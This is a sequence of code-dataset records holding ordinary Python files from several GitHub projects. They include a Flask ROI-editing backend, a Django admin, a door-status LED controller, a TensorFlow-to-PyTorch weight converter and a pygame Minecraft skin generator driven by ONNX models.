dataset.ROIs[label]\n except KeyError:\n return jsonify(result='failed to located ROI List')\n\n rois = filter(lambda r: r.id != roi_id, rois)\n dataset.add_ROIs(ROIList(rois), label=label)\n\n return jsonify(result='success')\n\n\n@app.route('/simplifyRoi', methods=['GET', 'POST'])\ndef simplifyRoi():\n roi_id = request.form.get('roiId')\n frame_shape = json.loads(request.form.get('frame_shape'))\n points = json.loads(request.form.get('points'))\n\n roi_data = []\n for i, plane in enumerate(points):\n if plane is None or not len(plane):\n continue\n array_dat = np.array(plane)\n z_dims = i*np.ones((array_dat.shape[:2]+(1,)))\n plane_data = np.concatenate((array_dat, z_dims), axis=2)\n roi_data.extend(list(plane_data))\n try:\n roi = ROI(polygons=roi_data, im_shape=frame_shape[:3])\n except:\n return jsonify(result='failed to create ROI')\n\n smoother = SmoothROIBoundaries()\n roi = smoother.apply([roi])[0]\n\n convertedRoi = []\n try:\n for i in range(roi.im_shape[0]):\n convertedRoi.append([])\n except:\n for i in range(np.max(np.array(roi.coords)[:, :, 2])):\n convertedRoi.append([])\n for poly in roi.polygons:\n coords = np.array(poly.exterior.coords)\n plane = int(coords[0, -1])\n coords = coords[:, :2].astype(int).tolist()\n convertedRoi[plane].append(coords)\n\n return jsonify({roi_id: {'points': convertedRoi}})\n\n\n@app.route('/getFolders')\ndef getFolders():\n directory = request.args.get('directory')\n subfolders = [\n os.path.basename(fname) for fname in glob.glob(\n os.path.join(directory, '*')) if os.path.isdir(fname) or\n os.path.splitext(fname)[-1] == '.h5']\n subfolders = ['']+sorted(subfolders)\n return render_template('select_list.html', options=subfolders)\n\n\n@app.route('/saveImage', methods=['GET', 'POST'])\ndef saveImage():\n image = request.form.get('image')\n filename = request.form.get('filename')\n fh = open(\"/home/jack/gt2497_5/\"+filename, \"wb\")\n fh.write(image.decode('base64'))\n fh.close()\n return jsonify(status='complete')\n","repo_name":"jbowler06/sima_visualization","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22144,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"12373680525","text":"from django.contrib import admin\nfrom .models import *\n\nfrom django.conf.locale.pt_BR import formats as pt_BR_formats\n\npt_BR_formats.DATETIME_FORMAT = \"d M Y H:i\"\npt_BR_formats.DATE_FORMAT = \"d M Y\"\n\n\nclass ItemAgendaAdmin(admin.ModelAdmin):\n list_display = ('data', 'hora', 'titulo', 'criado_em')\n date_hierarchy = ('data')\n search_fieldes = ('titulo',)\n filter_horizontal = ('participantes',)\n\n \n\nclass AuthorAdmin(admin.ModelAdmin):\n fields = ('name', 'title')\n \nclass AuthorAdmin(admin.ModelAdmin):\n exclude = ('birth_date')\n\n\nadmin.site.register(LocalEvento)\nadmin.site.register(ItemAgenda, ItemAgendaAdmin)\n \n# Register your models here.\n","repo_name":"Israelllira/mysite_teste","sub_path":"agenda/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70651072719","text":"\n#!/usr/bin/env -S python3 -u\n\nimport requests\nimport os\nimport time\n\ndoorIsOpen = False\n\ndef checkDoor():\n try:\n r = requests.get(\"http://fius.informatik.uni-stuttgart.de/isOpen.php\")\n if \"open\" in r.text:\n setDoorOpen(True)\n else:\n setDoorOpen(False)\n except Exception as e:\n print(\"Error in checkDoor: \", e)\n\ndef 
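# The door controller here polls a status page but fires webhooks only on
# *transitions*; a tiny edge-detector sketch (the None sentinel, unlike the
# module's False default, also reports the very first sample):
last = None

def on_sample(is_open):
    global last
    if is_open != last:
        print('door opened' if is_open else 'door closed')  # side effects fire once
    last = is_open

for s in (False, False, True, True, False):
    on_sample(s)  # prints: door closed, door opened, door closed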
setDoorOpen(state):\n global doorIsOpen\n\n if not(state == doorIsOpen):\n doorIsOpen = state\n ceilingIP = os.environ['LED_CEILING']\n dishwasherIP = os.environ['LED_DISHWASHER']\n if doorIsOpen:\n print(\"Door was opened\")\n doCheckedPostRequestWithBody(\"http://\"+ceilingIP+\"/animationType\",1)\n doCheckedPostRequest(\"http://\"+dishwasherIP+\"?doorOpen\")\n else:\n print(\"Door was closed\")\n doCheckedPostRequestWithBody(\"http://\"+ceilingIP+\"/animationType\",0)\n doCheckedPostRequest(\"http://\"+dishwasherIP+\"/?doorClosed\")\n\ndef doCheckedPostRequest(url):\n try:\n requests.post(url)\n except Exception as e:\n print(\"Error in post: \", e)\n\ndef doCheckedPostRequestWithBody(url,state):\n try:\n requests.post(url, json={\"type\": state})\n except Exception as e:\n print(\"Error in post: \", e)\n \nwhile True:\n checkDoor()\n time.sleep(5)\n","repo_name":"FIUS/led-door-control","sub_path":"doorControll.py","file_name":"doorControll.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"28402666838","text":"from factory import fuzzy\nfrom datetime import datetime, timedelta\n\n\ndef get_fuzzy_date(start_days_ago, end_days_ago):\n date = fuzzy.FuzzyDate(\n start_date=(datetime.now() - timedelta(days=start_days_ago)).date(),\n end_date=(datetime.now() - timedelta(days=end_days_ago)).date(),\n ).fuzz()\n return datetime(date.year, date.month, date.day)\n","repo_name":"fazalIqubal/track","sub_path":"api/project/test/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32253762375","text":"\"\"\"\nHelper functions to assist in conversion of TensorBreeze models into pytorch\nmodels\n\"\"\"\n\nfrom __future__ import absolute_import\n\nfrom collections import OrderedDict\nimport torch\nfrom .weights_io import load_state_dict_from_file\n\nTORCH_DELIMITER = '.'\nTF_DELIMITER = '/'\nTF_POSTFIX_SEP = ':'\n\next_map = {\n 'kernel': 'weight',\n 'bias': 'bias'\n}\n\nbn_ext_map = {\n 'gamma': 'weight',\n 'beta': 'bias',\n 'moving_mean': 'running_mean',\n 'moving_variance': 'running_var',\n 'num_batches_tracked': 'num_batches_tracked'\n}\n\n\ndef split_base_ext(name, delim=TF_DELIMITER):\n \"\"\"\n Splits a name by a delimitter then splits the returning list into\n basename (as list) and ext\n \"\"\"\n name = name.split(TF_POSTFIX_SEP)[0]\n name_split = name.split(delim)\n return name_split[:-1], name_split[-1]\n\n\ndef reorder_kernel_weight(tf_weight):\n \"\"\" Reorder a tf kernel weight into a torch format \"\"\"\n len_shape = len(tf_weight.shape)\n transpose_target = list(range(len_shape))\n transpose_target = transpose_target[2:][::-1] + transpose_target[:2]\n return tf_weight.permute(transpose_target)\n\n\ndef check_if_bn(tf_name):\n \"\"\" Determine if weight is part of a batch norm layer \"\"\"\n basename, ext = split_base_ext(tf_name, TF_DELIMITER)\n return ext in bn_ext_map\n\n\ndef check_if_kernel(tf_name):\n \"\"\" Determine if weight is a FC or conv kernel \"\"\"\n basename, ext = split_base_ext(tf_name, TF_DELIMITER)\n return ext == 'kernel'\n\n\ndef convert_name(tf_name, is_bn=False):\n \"\"\"\n Converts a TensorBreeze variable name into a pytorch name\n\n Args:\n is_bn: Perform variable name conversion of BN weight\n \"\"\"\n basename, tf_ext = split_base_ext(tf_name, TF_DELIMITER)\n\n if is_bn:\n torch_ext = bn_ext_map[tf_ext]\n else:\n if tf_ext in 
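# A worked check of the kernel reordering above: TensorFlow stores a conv
# kernel as (kh, kw, in_ch, out_ch) while torch expects (out_ch, in_ch, kh, kw).
import torch

tf_weight = torch.randn(3, 3, 16, 32)  # kh, kw, in, out
dims = list(range(tf_weight.dim()))    # [0, 1, 2, 3]
perm = dims[2:][::-1] + dims[:2]       # [3, 2, 0, 1], as computed above
print(tf_weight.permute(*perm).shape)  # torch.Size([32, 16, 3, 3])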
ext_map:\n torch_ext = ext_map[tf_ext]\n else:\n torch_ext = tf_ext\n\n torch_name = TORCH_DELIMITER.join(basename + [torch_ext])\n return torch_name\n\n\ndef convert_state_dict(tf_state_dict):\n \"\"\"\n Converts a TensorBreeze `state dict` into a torch state dict\n \"\"\"\n torch_state_dict = OrderedDict()\n\n for tf_name, tf_value in tf_state_dict.items():\n is_bn = check_if_bn(tf_name)\n is_kernel = check_if_kernel(tf_name)\n\n torch_name = convert_name(tf_name, is_bn=is_bn)\n torch_value = torch.Tensor(tf_value)\n\n if is_kernel:\n torch_value = reorder_kernel_weight(torch_value)\n\n torch_state_dict[torch_name] = torch_value\n\n return torch_state_dict\n\n\ndef convert_state_dict_file(tf_file, save_file):\n \"\"\"\n Reads a tf `state dict` from file and savs it as a TensorBreeze\n state dict\n \"\"\"\n tf_state_dict = load_state_dict_from_file(tf_file)\n torch_state_dict = convert_state_dict(tf_state_dict)\n torch.save(torch_state_dict, save_file)\n","repo_name":"mingruimingrui/TensorBreeze","sub_path":"tensorbreeze/utils/tf_to_torch.py","file_name":"tf_to_torch.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"26553477454","text":"import os\nimport onnxruntime as ort\nfrom PIL import Image\nimport random\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename\nimport numpy as np\nimport sys\nimport pygame\nfrom scipy.signal import convolve2d\n\n\ndef get_file_path(file_name):\n if hasattr(sys, '_MEIPASS'):\n base_path = sys._MEIPASS\n else:\n base_path = os.path.dirname(os.path.abspath(__file__))\n\n file_path = os.path.join(base_path, file_name)\n return file_path\n\ndef point_vs_rect(px,py,rx,ry,rw,rh):\n return px > rx and px <= rx+rw and py > ry and py < ry+rh\n\nclass App:\n\n def __init__(self):\n\n pygame.init()\n\n self.width = 900\n self.height = 600\n self.background_color = [18,18,20]\n self.running = True\n self.window = pygame.display.set_mode((self.width, self.height))\n pygame.display.set_caption(\"Minecraft Skin Generator\")\n pygame.display.set_icon(pygame.image.load(get_file_path(\"icon.png\")))\n self.clock = pygame.time.Clock()\n self.keys_pressed = None\n\n self.font = pygame.font.SysFont(\"Arial\", 18)\n self.font_small = pygame.font.SysFont(\"Arial\", 10)\n\n self.session_options = ort.SessionOptions()\n self.session_options.intra_op_num_threads = 2\n self.session_options.inter_op_num_threads = 2\n\n self.model_decode = ort.InferenceSession(get_file_path(\"model_decode.onnx\"), self.session_options)\n self.model_encode = ort.InferenceSession(get_file_path(\"model_encode.onnx\"), self.session_options)\n\n self.pca_components = np.load(get_file_path(\"pca_256_components.npy\"))\n self.pca_mean = np.load(get_file_path(\"pca_256_mean.npy\"))\n self.pca_std = np.load(get_file_path(\"pca_256_latentspace_std.npy\"))\n self.pca_eigenvalues = np.load(get_file_path(\"pca_256_explained_variance.npy\"))\n\n self.skin_layout = np.zeros((64, 64))\n self.skin_layout[:8,8:24] = 1\n self.skin_layout[8:16,:32] = 1\n self.skin_layout[20:32,:56] = 1\n self.skin_layout[16:20,4:12] = 1\n self.skin_layout[16:20,20:36] = 1\n self.skin_layout[16:20,44:52] = 1\n self.skin_layout[52:,16:48] = 1\n self.skin_layout[48:,20:28] = 1\n self.skin_layout[48:,36:44] = 1\n\n self.skin_front_layout = np.load(get_file_path(\"skin_front_layout.npy\"))\n self.skin_front_overlay_layout = np.load(get_file_path(\"skin_front_overlay_layout.npy\"))\n self.skin_back_layout = 
np.load(get_file_path(\"skin_back_layout.npy\"))\n self.skin_back_overlay_layout = np.load(get_file_path(\"skin_back_overlay_layout.npy\"))\n with open(get_file_path(\"pca_descriptions.txt\"), \"r\") as file:\n self.slider_descriptions = file.read().splitlines()\n\n self.move_sliders = False\n self.update_sliders = False\n self.slider_move_frames = 10\n self.slider_move_target = np.clip((np.random.normal(0, 1, (256))/6) + 0.5, 0, 1)\n self.slider_move_speed = (self.slider_move_target) / self.slider_move_frames\n\n self.input_values = np.zeros((1,512), dtype=np.float32)\n self.slider_values = np.full((256), 0.5, dtype=np.float32)\n self.slider_offset = 0\n self.number_of_sliders = 256\n self.slider_spacing = 5\n self.slider_x = 10\n self.slider_y = 390\n self.slider_width = 16\n self.slider_height = 180\n self.slider_knob_height = 8\n self.number_of_sliders_shown = 42\n self.slider_colors = [(random.randint(100,255), random.randint(100,255), random.randint(100,255)) for i in range(self.number_of_sliders)]\n self.mouse_over_slider_i = None\n self.mouse_pressed_slider_i = None\n self.slider_scroll_speed = 3\n self.slider_numbers = [self.font_small.render(str(i+1), True, (255,255,255)) for i in range(256)]\n\n self.skin_surface = None\n self.skin_array = np.zeros((64, 64, 4), dtype=np.uint8)\n self.skin_render_front_surface = None\n self.skin_render_back_surface = None\n\n self.overlay = True\n\n self.sharpen_skin = False\n self.mouse_pressed_sharpen_slider = False\n self.sharpen_slider_x = self.width-200\n self.sharpen_slider_y = 193\n self.sharpen_slider_width = 170\n self.sharpen_slider_height = 18\n self.sharpen_slider_knob_width = 8\n self.sharpen_max = 25\n self.sharpen_min = 4.0001\n self.sharpen_value_default = 12\n self.sharpen_value = self.sharpen_value_default\n\n self.reduce_colors = False\n self.mouse_pressed_colors_slider = False\n self.number_colors_slider_x = self.width-200\n self.number_colors_slider_y = 264\n self.number_colors_slider_width = 170\n self.number_colors_slider_height = 18\n self.number_colors_slider_knob_width = 8\n self.number_colors_max = 64\n self.number_colors_min = 1\n self.number_of_colors_default = 16\n self.number_of_colors = self.number_of_colors_default\n\n self.mouse_pressed_range_slider = False\n self.slider_range_x = self.width-200\n self.slider_range_y = 340\n self.slider_range_width = 170\n self.slider_range_height = 18\n self.slider_range_knob_width = 8\n self.slider_range_max = 6\n self.slider_range_min = 0.1\n self.slider_range_default = 3\n self.slider_range_factor = self.slider_range_default\n\n\n self.text_randomize_slider = self.font.render(\"R - Randomize sliders\", True, (255,255,255))\n self.text_reset_slider = self.font.render(\"0 - Reset sliders\", True, (255,255,255))\n self.text_save_skin = self.font.render(\"S - Save skin\", True, (255,255,255))\n self.text_load_skin = self.font.render(\"L - Load skin\", True, (255,255,255))\n self.text_converge = self.font.render(\"H - Converge\", True, (255,255,255))\n self.text_move_sliders = self.font.render(\"M - Move sliders\", True, (255,255,255) if self.move_sliders else (100,100,100))\n self.text_toggle_overlay = self.font.render(\"O - Toggle overlay\", True, (255,255,255) if self.overlay else (100,100,100))\n self.text_sharpen = self.font.render(\"X - Sharpen\", True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.text_sharpen_value = self.font.render(\"Sharpen value: \" + str(self.sharpen_value), True, (255,255,255) if self.sharpen_skin else (100,100,100))\n 
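# A hedged sketch of the slider-to-latent mapping this UI implies: a slider at
# 0.5 sits on the latent mean and the range spans +/- `range_factor` standard
# deviations per PCA component. The app's exact scaling may differ.
import numpy as np

rng = np.random.default_rng(0)
pca_std = rng.uniform(0.5, 2.0, 256)  # stand-in for pca_256_latentspace_std.npy

def sliders_to_latent(sliders, range_factor=3.0):
    return (sliders - 0.5) * 2.0 * range_factor * pca_std

z = sliders_to_latent(np.full(256, 0.5))
print(np.allclose(z, 0))  # True: centred sliders decode to the latent mean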
self.text_reduce_colors = self.font.render(\"C - Reduce colors\", True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.text_number_of_colors = self.font.render(\"Number of colors: \" + str(self.number_of_colors), True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.text_slider_range = self.font.render(\"Slider range: \" + str(self.slider_range_factor), True, (255,255,255))\n self.text_slider_description = self.font.render(\"\", True, (255,255,255))\n\n self.update_inputs_from_sliders()\n self.run_model()\n\n\n def reduce_color_palette(self, image, num_colors):\n image = Image.fromarray(np.uint8(image))\n quantized_image = image.quantize(colors=num_colors, method=Image.Quantize.MEDIANCUT, kmeans=0, palette=None, dither=Image.FLOYDSTEINBERG)\n quantized_image = quantized_image.convert('RGB')\n return np.array(quantized_image)\n\n def apply_sharpening_filter(self, image, strength=10, sharpen_alpha=False):\n kernel = np.array([\n [0, -1, 0],\n [-1, strength, -1],\n [0, -1, 0]\n ], dtype=np.float32)\n kernel = kernel / np.sum(kernel)\n\n sharpened_image = image.copy()\n\n for i in range(4 if sharpen_alpha else 3): # Loop through color channels\n sharpened_image[:, :, i] = convolve2d(image[:, :, i], kernel, mode='same')\n\n return np.clip(sharpened_image, 0, 1)\n\n def run_model(self):\n model_output = self.model_decode.run(None, {\"input\": self.input_values})[0][0]\n model_output = model_output.transpose(1, 2, 0)\n\n # remove overlay\n if not self.overlay:\n model_output[:,:,3] = self.skin_layout\n\n alpha_mask = model_output[:,:,3:]\n\n # sharpen skin\n if self.sharpen_skin:\n model_output = self.apply_sharpening_filter(model_output, self.sharpen_value, True)\n\n # reduce colors\n if self.reduce_colors:\n reduced_model_output = self.reduce_color_palette(model_output[:,:,:3]*255, self.number_of_colors)\n model_output = np.concatenate((reduced_model_output, model_output[:,:,3:]*255), axis=2).astype(np.uint8)\n self.skin_array = model_output\n else:\n self.skin_array = (model_output*255).astype(np.uint8)\n\n skin_data = (self.skin_array[:,:,:3] * alpha_mask).transpose(1, 0, 2)\n self.skin_surface = pygame.surfarray.make_surface(skin_data)\n self.skin_surface = pygame.transform.scale(self.skin_surface, (300, 300))\n\n self.skin_array[0,0,:3] = self.background_color # set background color\n self.skin_array[0,0,3] = 0\n\n rendered_skin = np.full((401,202,4), 255, dtype=np.uint8)\n rendered_skin[:,:,:3] = self.skin_array[self.skin_front_layout[:,:,0],self.skin_front_layout[:,:,1],:3]\n overlay_alpha = self.skin_array[self.skin_front_overlay_layout[:,:,0],self.skin_front_overlay_layout[:,:,1],3:]/255\n rendered_skin[:,:,:3] = rendered_skin[:,:,:3] * (1-overlay_alpha) + overlay_alpha * self.skin_array[self.skin_front_overlay_layout[:,:,0],self.skin_front_overlay_layout[:,:,1],:3]\n self.skin_render_front_surface = pygame.surfarray.make_surface(rendered_skin.transpose(1, 0, 2)[:,:,:3])\n self.skin_render_front_surface = pygame.transform.scale(self.skin_render_front_surface, (150, 300))\n \n rendered_skin[:,:,:3] = self.skin_array[self.skin_back_layout[:,:,0],self.skin_back_layout[:,:,1],:3]\n overlay_alpha = self.skin_array[self.skin_back_overlay_layout[:,:,0],self.skin_back_overlay_layout[:,:,1],3:]/255\n rendered_skin[:,:,:3] = rendered_skin[:,:,:3] * (1-overlay_alpha) + overlay_alpha * self.skin_array[self.skin_back_overlay_layout[:,:,0],self.skin_back_overlay_layout[:,:,1],:3]\n self.skin_render_back_surface = pygame.surfarray.make_surface(rendered_skin.transpose(1, 
0, 2)[:,:,:3])\n self.skin_render_back_surface = pygame.transform.scale(self.skin_render_back_surface, (150, 300))\n\n def load_skin(self):\n file_path = askopenfilename(defaultextension=\".png\", filetypes=[(\"PNG Image\", \"*.png\"), (\"JPEG Image\", \"*.jpg\"), (\"All files\", \"*\")])\n if file_path != \"\":\n try:\n img = np.array(Image.open(file_path).convert(\"RGBA\")).transpose(2,0,1).astype(np.float32)/255\n\n # if classic skin -> convert to 64x64 skin\n if img.shape[1] == 32 and img.shape[2] == 64:\n #convert classic skin to normal 64x64 skin\n new_img = np.zeros((4,64,64), dtype=np.float32)\n new_img[:,:32,:] = img\n new_img[:,48:,16:32] = new_img[:,16:32,:16]\n new_img[:,48:,32:48] = new_img[:,16:32,40:56]\n img = new_img\n\n if not (img.shape[1] == 64 and img.shape[2] == 64):\n print(\"Error: wrong skin size. image must be 64x64 or 32x64 pixels\") \n return\n \n new_inputs = self.model_encode.run(None, {\"input\": img.reshape(1,4,64,64)})[0]\n if self.move_sliders:\n raw_slider_values = np.dot(new_inputs[0] - self.pca_mean, self.pca_components.T)\n self.slider_move_target = (1-(raw_slider_values/(self.pca_std * self.slider_range_factor)))/2\n self.slider_move_target = np.clip(self.slider_move_target, 0, 1)\n self.slider_move_speed = (self.slider_move_target - self.slider_values) / self.slider_move_frames\n self.update_sliders = True\n else:\n self.input_values = new_inputs\n self.update_sliders_from_inputs()\n self.run_model()\n except:\n print(\"Error: couldn't load skin\")\n\n def save_skin(self):\n file_path = asksaveasfilename(defaultextension=\".png\", filetypes=[(\"PNG Image\", \"*.png\"), (\"JPEG Image\", \"*.jpg\"), (\"All files\", \"*\")])\n if file_path != \"\":\n try:\n Image.fromarray(self.skin_array).save(file_path)\n except:\n print(\"Error: couldn't save skin as image\")\n\n def update_inputs_from_sliders(self):\n pca_input = (1-(self.slider_values*2)) * self.pca_std * self.slider_range_factor\n self.input_values[0] = np.dot(pca_input, self.pca_components) + self.pca_mean\n\n def update_sliders_from_inputs(self):\n raw_slider_values = np.dot(self.input_values[0] - self.pca_mean, self.pca_components.T)\n self.slider_values = (1-(raw_slider_values/(self.pca_std * self.slider_range_factor)))/2\n self.slider_values = np.clip(self.slider_values, 0, 1)\n\n def randomize_slider_values(self):\n if self.move_sliders:\n self.slider_move_target = np.clip((np.random.normal(0, 1, (256))/6) + 0.5, 0, 1)\n self.slider_move_speed = (self.slider_move_target - self.slider_values) / self.slider_move_frames\n self.update_sliders = True\n else:\n self.slider_values = (1-(np.random.normal(0, self.pca_std, 256)/(self.pca_std * self.slider_range_factor)))/2\n self.slider_values = np.clip(self.slider_values, 0, 1)\n self.update_inputs_from_sliders()\n\n def reset_slider_values(self):\n if self.move_sliders:\n self.slider_move_target = np.full((256), 0.5, dtype=np.float32)\n self.slider_move_speed = (self.slider_move_target - self.slider_values) / self.slider_move_frames\n self.update_sliders = True\n else:\n self.slider_values = np.full((256), 0.5, dtype=np.float32)\n self.update_inputs_from_sliders()\n\n def update(self):\n\n # feed output-skin back through model\n if self.keys_pressed[pygame.K_h]:\n self.input_values = self.model_encode.run(None, {\"input\": [(self.skin_array.transpose(2,0,1)/255).astype(np.float32)]})[0]\n self.update_sliders_from_inputs()\n self.update_inputs_from_sliders()\n self.run_model()\n self.update_sliders = False\n \n # move sliders\n if self.move_sliders 
and self.update_sliders:\n #move sliders with constant speed\n self.slider_values += np.where(self.slider_values != self.slider_move_target, self.slider_move_speed, 0)\n self.slider_values = np.where(abs(self.slider_values - self.slider_move_target) <= self.slider_move_speed, self.slider_move_target, self.slider_values)\n \n if np.sum(np.abs(self.slider_values - self.slider_move_target)) < 0.1:\n self.slider_values = self.slider_move_target\n self.update_sliders = False\n \n # self.slider_values += (self.slider_move_target - self.slider_values) * self.slider_move_speed\n self.update_inputs_from_sliders()\n self.run_model()\n\n \n\n def run(self):\n while self.running:\n self.mouse_x, self.mouse_y = pygame.mouse.get_pos()\n\n # Handle events\n self.keys_pressed = pygame.key.get_pressed()\n event_list = pygame.event.get()\n for event in event_list:\n if event.type == pygame.QUIT:\n self.running = False\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_r:\n self.randomize_slider_values()\n self.run_model()\n elif event.key == pygame.K_0:\n self.reset_slider_values()\n self.run_model()\n elif event.key == pygame.K_s:\n self.save_skin()\n elif event.key == pygame.K_l:\n self.load_skin()\n elif event.key == pygame.K_m:\n self.move_sliders = not self.move_sliders\n if not self.move_sliders:\n self.update_sliders = False\n self.text_move_sliders = self.font.render(\"M - Move sliders\", True, (255,255,255) if self.move_sliders else (100,100,100))\n elif event.key == pygame.K_o:\n self.overlay = not self.overlay\n self.text_toggle_overlay = self.font.render(\"O - Toggle overlay\", True, (255,255,255) if self.overlay else (100,100,100))\n self.run_model()\n elif event.key == pygame.K_x:\n self.sharpen_skin = not self.sharpen_skin\n self.text_sharpen = self.font.render(\"X - Sharpen\", True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.text_sharpen_value = self.font.render(\"Sharpen value: \" + str(round(self.sharpen_value,1)), True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.run_model()\n elif event.key == pygame.K_c:\n self.reduce_colors = not self.reduce_colors\n self.text_reduce_colors = self.font.render(\"C - Reduce colors\", True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.text_number_of_colors = self.font.render(\"Number of colors: \" + str(self.number_of_colors), True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.run_model()\n \n elif event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1: # left mouse button\n self.mouse_pressed_slider_i = self.mouse_over_slider_i\n\n # mouse over pca sliders\n if self.mouse_pressed_slider_i != None:\n if self.update_sliders:\n self.mouse_pressed_slider_i = None\n else:\n self.slider_values[self.mouse_pressed_slider_i] = np.clip((self.mouse_y - self.slider_y - self.slider_knob_height/2) / (self.slider_height-self.slider_knob_height), 0, 1)\n self.update_inputs_from_sliders()\n self.run_model()\n\n # mouse over sharpen slider\n if point_vs_rect(self.mouse_x, self.mouse_y, self.sharpen_slider_x, self.sharpen_slider_y, self.sharpen_slider_width, self.sharpen_slider_height):\n self.mouse_pressed_sharpen_slider = True\n self.sharpen_value = np.clip(((self.mouse_x - self.sharpen_slider_x - self.sharpen_slider_knob_width/2) / (self.sharpen_slider_width-self.sharpen_slider_knob_width)),0,1)**2 * (self.sharpen_max-self.sharpen_min) + self.sharpen_min\n self.text_sharpen_value = self.font.render(\"Sharpen value: \" + str(round(self.sharpen_value,1)), True, (255,255,255) if 
self.sharpen_skin else (100,100,100))\n self.run_model()\n \n # mouse over number of colors slider\n if point_vs_rect(self.mouse_x, self.mouse_y, self.number_colors_slider_x, self.number_colors_slider_y, self.number_colors_slider_width, self.number_colors_slider_height):\n self.mouse_pressed_colors_slider = True\n self.number_of_colors = int(np.clip(((self.mouse_x - self.number_colors_slider_x - self.number_colors_slider_knob_width/2) / (self.number_colors_slider_width-self.number_colors_slider_knob_width)),0,1)**2 * (self.number_colors_max-self.number_colors_min) + self.number_colors_min)\n self.text_number_of_colors = self.font.render(\"Number of colors: \" + str(self.number_of_colors), True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.run_model()\n\n # mouse over slider range slider\n if point_vs_rect(self.mouse_x, self.mouse_y, self.slider_range_x, self.slider_range_y, self.slider_range_width, self.slider_range_height):\n self.mouse_pressed_range_slider = True\n self.slider_range_factor = np.clip(((self.mouse_x - self.slider_range_x - self.slider_range_knob_width/2) / (self.slider_range_width-self.slider_range_knob_width)),0,1) * (self.slider_range_max-self.slider_range_min) + self.slider_range_min\n self.text_slider_range = self.font.render(\"Slider range: \" + str(round(self.slider_range_factor,2)), True, (255,255,255))\n self.update_inputs_from_sliders()\n self.run_model()\n \n\n elif event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1: # left mouse button\n self.mouse_pressed_slider_i = None\n self.mouse_pressed_colors_slider = False\n self.mouse_pressed_sharpen_slider = False\n self.mouse_pressed_range_slider = False\n\n elif event.type == pygame.MOUSEMOTION:\n if point_vs_rect(self.mouse_x, self.mouse_y, self.slider_x-self.slider_spacing/2, self.slider_y, (self.slider_width+self.slider_spacing)*self.number_of_sliders_shown, self.slider_height):\n if self.update_sliders:\n self.mouse_pressed_slider_i = None\n else:\n before_i = self.mouse_over_slider_i\n self.mouse_over_slider_i = self.slider_offset + int((self.mouse_x - self.slider_x + self.slider_spacing/2) / (self.slider_width + self.slider_spacing))\n if self.mouse_over_slider_i != before_i:\n i = self.mouse_over_slider_i if self.mouse_pressed_slider_i == None else self.mouse_pressed_slider_i\n self.text_slider_description = self.font.render(f\"{i+1}: \"+self.slider_descriptions[i], True, (255,255,255))\n else:\n self.mouse_over_slider_i = None\n\n if self.mouse_pressed_slider_i != None:\n self.slider_values[self.mouse_pressed_slider_i] = np.clip((self.mouse_y - self.slider_y - self.slider_knob_height/2) / (self.slider_height-self.slider_knob_height), 0, 1)\n self.update_inputs_from_sliders()\n self.run_model()\n\n if self.mouse_pressed_sharpen_slider:\n self.sharpen_value = np.clip(((self.mouse_x - self.sharpen_slider_x - self.sharpen_slider_knob_width/2) / (self.sharpen_slider_width-self.sharpen_slider_knob_width)),0,1)**2 * (self.sharpen_max-self.sharpen_min) + self.sharpen_min\n if abs(self.sharpen_value - self.sharpen_value_default) < 0.5:\n self.sharpen_value = self.sharpen_value_default\n self.text_sharpen_value = self.font.render(\"Sharpen value: \" + str(round(self.sharpen_value,1)), True, (255,255,255) if self.sharpen_skin else (100,100,100))\n self.run_model()\n\n if self.mouse_pressed_colors_slider:\n self.number_of_colors = int(np.clip(((self.mouse_x - self.number_colors_slider_x - self.number_colors_slider_knob_width/2) / 
(self.number_colors_slider_width-self.number_colors_slider_knob_width)),0,1)**2 * (self.number_colors_max-self.number_colors_min) + self.number_colors_min)\n self.text_number_of_colors = self.font.render(\"Number of colors: \" + str(self.number_of_colors), True, (255,255,255) if self.reduce_colors else (100,100,100))\n self.run_model()\n\n if self.mouse_pressed_range_slider:\n self.slider_range_factor = np.clip(((self.mouse_x - self.slider_range_x - self.slider_range_knob_width/2) / (self.slider_range_width-self.slider_range_knob_width)),0,1) * (self.slider_range_max-self.slider_range_min) + self.slider_range_min\n if abs(self.slider_range_factor - self.slider_range_default) < 0.3:\n self.slider_range_factor = self.slider_range_default\n self.text_slider_range = self.font.render(\"Slider range: \" + str(round(self.slider_range_factor,2)), True, (255,255,255))\n self.update_inputs_from_sliders()\n self.run_model()\n\n elif event.type == pygame.MOUSEWHEEL:\n self.slider_offset = np.clip(self.slider_offset - event.y*self.slider_scroll_speed, 0, self.number_of_sliders-self.number_of_sliders_shown)\n\n\n self.update()\n \n\n if pygame.display.get_active():\n self.window.fill(self.background_color)\n\n # draw skin\n self.window.blit(self.skin_surface, (10, 10))\n self.window.blit(self.skin_render_front_surface, (320, 10))\n self.window.blit(self.skin_render_back_surface, (480, 10))\n\n # draw pca sliders\n for slider_i in range(self.slider_offset, self.slider_offset+self.number_of_sliders_shown):\n slider_x = self.slider_x + (self.slider_width + self.slider_spacing) * (slider_i-self.slider_offset)\n slider_color = self.slider_colors[slider_i]\n pygame.draw.line(self.window, (slider_color[0]/2, slider_color[1]/2, slider_color[2]/2), \n (slider_x+self.slider_width/2, self.slider_y), \n (slider_x+self.slider_width/2, self.slider_y + self.slider_height))\n pygame.draw.line(self.window, (slider_color[0]/2, 